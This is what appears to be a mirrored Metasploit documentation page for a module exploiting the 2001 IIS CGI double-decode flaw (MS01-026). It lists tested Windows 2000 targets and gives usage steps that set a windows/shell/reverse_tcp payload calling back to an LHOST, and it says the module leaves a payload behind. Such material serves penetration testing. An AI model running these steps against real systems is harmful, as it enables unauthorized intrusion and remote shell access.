Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/windows/iis/ms01_026_dbldecode.md
Views: 11789
Vulnerable Application
This module will execute an arbitrary payload on a Microsoft IIS installation that is vulnerable to the CGI double-decode vulnerability of 2001.
This module has been tested successfully on:
Windows 2000 Professional (SP0) (EN)
Windows 2000 Professional (SP1) (AR)
Windows 2000 Professional (SP1) (CZ)
Windows 2000 Server (SP0) (FR)
Windows 2000 Server (SP1) (EN)
Windows 2000 Server (SP1) (SE)
Note: This module will leave a Metasploit payload in the IIS scripts directory.
Verification Steps
use exploit/windows/iis/ms01_026_dbldecode
set RHOSTS [IP]
set PAYLOAD windows/shell/reverse_tcp
set LHOST [IP]
run
Options
WINDIR
The Windows directory name of the target host. The directory name will be detected automatically if not set.
DEPTH
Traversal depth to reach the drive root (default: 2
)